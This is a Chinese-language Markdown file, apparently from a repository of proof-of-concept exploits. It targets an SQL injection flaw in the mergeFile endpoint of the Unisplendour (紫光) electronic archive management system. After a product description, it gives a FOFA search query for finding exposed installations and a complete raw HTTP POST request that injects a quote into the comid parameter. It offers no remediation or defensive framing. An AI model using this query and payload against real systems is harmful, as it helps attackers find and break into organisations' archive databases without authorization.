POC/wpoc/紫光电子档案管理系统/紫光档案管理系统mergeFile存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

27 lines
1.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 紫光档案管理系统mergeFile存在SQL注入漏洞
紫光电子档案管理系统是一款专业的电子档案管理软件旨在帮助企业实现高效、便捷的档案管理。系统具有强大的文件存储、检索和共享功能能够提供全面的档案管理解决方案。同时紫光电子档案管理系统还拥有智能化的分类和归档功能可以自动识别文件类型和属性实现快速分类和高效管理。用户只需简单操作就能轻松实现对各类电子档案的整理、查询和备份极大提升了工作效率和信息安全性。紫光档案管理系统mergeFile存在SQL注入漏洞
## fofa
```javascript
app="紫光-档案管理系统" && body="www.unissoft.com"
```
## poc
```java
POST /Archive/ErecordManage/mergeFile HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
userID=admin&fondsid=1&comid=1'
```
![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731327037075-c9e88b13-b658-4e7e-b7ad-a6c7d12dca30.png)